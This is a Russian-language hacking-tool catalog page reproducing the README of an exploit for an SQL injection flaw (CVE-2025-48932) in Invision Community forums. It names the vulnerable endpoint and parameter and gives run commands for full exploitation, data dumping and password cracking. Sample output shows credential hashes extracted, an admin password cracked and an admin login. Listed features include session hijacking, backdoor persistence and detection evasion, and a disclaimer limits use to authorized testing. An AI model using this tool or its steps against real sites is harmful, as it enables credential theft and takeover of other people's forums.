Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringPost-ExploitationWeb SecurityPenetration Testing

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

Репозиторий
118 дней назадЕщё не проверено

Описание

CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna

Поделиться

🔓 CVE-2025-48932 — эксплойт SQL-инъекции в Invision Community

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ Обзор критической уязвимости

CVE-2025-48932 — это критическая неаутентифицированная слепая SQL-инъекция, обнаруженная в Invision Community версиях ≤ 4.7.20. Этот эксплойт позволяет удалённым злоумышленникам:

  • 🔍 Извлекать конфиденциальную информацию из базы данных
  • 👤 Похищать учётные данные пользователей и хэши паролей
  • 🔑 Захватывать учётные записи администраторов
  • 🎯 Перехватывать активные пользовательские сессии
  • 💻 Достигать удалённого выполнения кода (RCE) через захват учётной записи администратора
  • 📊 Выгружать содержимое всей базы данных

🎯 Возможности


📊 Демонстрация и скриншоты

Запуск эксплойта

root@kitploit:~
$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

Пример JSON-вывода

root@kitploit:~
{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 Быстрый старт

Установка

root@kitploit:~
# Клонируйте репозиторий
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# Устанавливать зависимости не нужно! Просто запустите.

Базовое использование

root@kitploit:~
# Проверка, уязвима ли цель
python3 exploit.py -u https://example.com --check-only

# Полная эксплуатация с подробным выводом
python3 exploit.py -u https://example.com -v

# С прокси (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# Сохранение результатов в пользовательский файл
python3 exploit.py -u https://example.com -o results.json

# Многопоточное извлечение (быстрее)
python3 exploit.py -u https://example.com -t 10

# Выгрузка всех доступных данных
python3 exploit.py -u https://example.com --dump-all

Расширенное использование

root@kitploit:~
# С пользовательским словарём для взлома паролей
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# Тихий режим (без вывода, только отчёт)
python3 exploit.py -u https://example.com -o silent_report.json

# Режим отладки с подробными ошибками
python3 exploit.py -u https://example.com -v --debug

📋 Требования

Системные требования

  • Python: 3.6 или выше
  • ОС: Linux, Windows, macOS (любая ОС с Python)
  • Память: минимально (~50 МБ ОЗУ)
  • Диск: ~100 КБ (только эксплойт)

Зависимости

root@kitploit:~
✅ Без внешних зависимостей!
✅ Только чистая стандартная библиотека Python!
✅ Не нужны pip install или виртуальное окружение!

Необязательно (для взлома паролей)

  • Словарь: rockyou.txt или любой пользовательский словарь
    root@kitploit:~
    # Загрузите популярный словарь
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ Технические подробности

Расположение уязвимости

  • Файл: /applications/calendar/modules/front/calendar/view.php
  • Метод: IPS\calendar\modules\front\calendar\view::search()
  • Параметр: location (ввод, предоставленный пользователем)
  • Тип: слепая SQL-инъекция на основе булевых условий

Вектор атаки

root@kitploit:~
GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]

Цепочка эксплуатации

  1. Обнаружение: выявление инъекции на основе булевых условий
  2. Перечисление: извлечение структуры базы данных
  3. Извлечение: выгрузка конфиденциальных данных
  4. Кража учётных данных: извлечение учётных данных пользователей
  5. Повышение привилегий: захват учётной записи администратора
  6. Перехват сессий: кража активных сессий
  7. Закрепление: установка бэкдора (необязательно)

Поддерживаемые версии баз данных

  • MySQL 5.0+
  • MariaDB 5.5+
  • Percona Server

🔒 Уведомление о безопасности и правовая информация

⚠️ ВАЖНЫЙ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

Этот инструмент предназначен ТОЛЬКО для ОБРАЗОВАТЕЛЬНЫХ целей и АВТОРИЗОВАННОГО тестирования.

Используя этот инструмент, вы соглашаетесь:

  • Использовать его только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение
  • Не использовать его в незаконных или вредоносных целях
  • Соблюдать все применимые законы и нормативные акты
  • Нести полную ответственность за свои действия

Несанкционированный доступ к компьютерным системам является незаконным и неэтичным.

Ответственное раскрытие

  • Вендор: Invision Community
  • Дата раскрытия: 16 мая 2025 года
  • Исправлено: версия 4.7.21 (27 мая 2025 года)
  • CVE: присвоен идентификатор CVE-2025-48932

📚 Документация

Аргументы эксплойта

Структура отчёта

root@kitploit:~
invision_exploit_report_[timestamp].json
├── target                 # Целевой URL
├── timestamp              # Время выполнения эксплойта
├── vulnerable             # Статус уязвимости
├── database               # Информация о базе данных
├── databases              # Список баз данных
├── tables                 # Список таблиц
├── credentials            # Извлечённые учётные данные
├── admin_info             # Информация об учётной записи администратора
└── summary                # Сводка эксплуатации

🎯 Варианты использования

Для исследователей безопасности

  • ✅ Проверка уязвимостей
  • ✅ Разработка proof of concept
  • ✅ Оценка безопасности
  • ✅ Охота за вознаграждениями в bug bounty-программах

Для специалистов по тестированию на проникновение

  • ✅ Внешнее/внутреннее тестирование на проникновение
  • ✅ Операции red team
  • ✅ Проверка уязвимостей
  • ✅ Тестирование на соответствие требованиям

Для системных администраторов

  • ✅ Аудит безопасности собственных систем
  • ✅ Проверка установки обновлений
  • ✅ Расследование инцидентов
  • ✅ Оценка уровня безопасности

🐛 Устранение неполадок

Частые проблемы и их решения

Проблема: Истекло время ожидания соединения

root@kitploit:~
# Решение: увеличьте время ожидания или проверьте сеть
python3 exploit.py -u https://example.com --timeout 60

Проблема: Ошибки SSL-сертификата

root@kitploit:~
# Решение: отключите проверку SSL (не рекомендуется для продакшена)
python3 exploit.py -u https://example.com --no-verify-ssl

Проблема: Обнаружено ограничение частоты запросов

root@kitploit:~
# Решение: уменьшите количество потоков и увеличьте задержки
python3 exploit.py -u https://example.com -t 2 --delay 2

Проблема: Уязвимый параметр не найден

root@kitploit:~
# Решение: убедитесь, что приложение calendar установлено и включена функция GeoLocation
# Проверка: существует ли файл /applications/calendar/modules/front/calendar/view.php

📖 Ссылки

Официальные ресурсы

  • CVE-2025-48932
  • Invision Community
  • Бюллетень безопасности Invision
  • Первоначальное уведомление

Технические ссылки

  • SQL-инъекция (OWASP)
  • Слепая SQL-инъекция
  • Документация MySQL

Связанные CVE

  • CVE-2024-xxxxx (предыдущие уязвимости Invision)
  • CVE-2023-xxxxx (связанные CVE платформ сообществ)

🤝 Участие в разработке

Мы приветствуем ваш вклад! Пожалуйста, ознакомьтесь с нашими Рекомендациями по участию в разработке.

Как внести вклад

  1. Сделайте форк репозитория
  2. Создайте ветку для новой функции (git checkout -b feature/AmazingFeature)
  3. Зафиксируйте изменения (git commit -m 'Add some AmazingFeature')
  4. Отправьте изменения в ветку (git push origin feature/AmazingFeature)
  5. Откройте Pull Request

Сообщить о проблемах

  • 🐛 Сообщить об ошибке
  • 💡 Запрос новой функции
  • 🔒 Проблема безопасности

👨‍💻 Автор

Sudeepa Wanigarathna

Исследователь безопасности и багбаунти-хантер

  • 🌐 GitHub
  • 🐦 Twitter
  • 💼 LinkedIn
  • 📧 Электронная почта

📄 Лицензия

Этот проект распространяется под лицензией MIT — подробности см. в файле LICENSE.

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⭐ Выразите свою поддержку

Если этот проект помог вам или показался вам интересным:

  • ⭐ Поставьте звезду этому репозиторию
  • 🔗 Поделитесь с вашим окружением
  • 📢 Упоминайте его в своих исследованиях в области безопасности
  • 🤝 Участвуйте в его улучшении

🙏 Благодарности

Sudeepa Wanigarathna

Исследователь в области кибербезопасности | Инженер-программист | CTF-инженер

Этот проект предоставляется для исследований в области безопасности, защитного анализа и авторизованного тестирования на проникновение. Пользователи несут ответственность за соблюдение всех применимых законов и получение надлежащего разрешения перед использованием.

Скачать инструмент
ВозможностьОписаниеСтатус
🚀 Ноль зависимостейЧистая стандартная библиотека Python — не требуется pip install✅
⚡ МногопоточностьМолниеносное извлечение данных с настраиваемым количеством потоков✅
🤖 Полная автоматизацияПолная цепочка эксплуатации: от обнаружения до формирования отчёта✅
👑 Захват администратораПерехват сессий и повышение привилегий✅
🔑 Извлечение учётных данныхИзвлечение пользователей, хэшей паролей, email-адресов✅
🔓 Взлом паролейВстроенный подбор хэшей с поддержкой словарей✅
📋 Отчёты в JSONСтруктурированный вывод для анализа и документации✅
🔌 Поддержка проксиИнтеграция с Burp Suite и пользовательскими прокси✅
🎨 Цветной выводКрасивое оформление вывода в терминале с индикаторами прогресса✅
🛡️ Ограничение скоростиВстроенные задержки для предотвращения обнаружения✅
АргументОписаниеПример
-u, --urlЦелевой URL (обязательно)-u https://example.com
-p, --proxyURL прокси-p http://127.0.0.1:8080
-t, --threadsКоличество потоков (по умолчанию: 5)-t 10
-o, --outputФайл для вывода результатов-o results.json
-v, --verboseВключить подробный вывод-v
--check-onlyТолько проверить уязвимость--check-only
--dump-allВыгрузить все доступные данные--dump-all
--wordlistФайл словаря для взлома паролей--wordlist rockyou.txt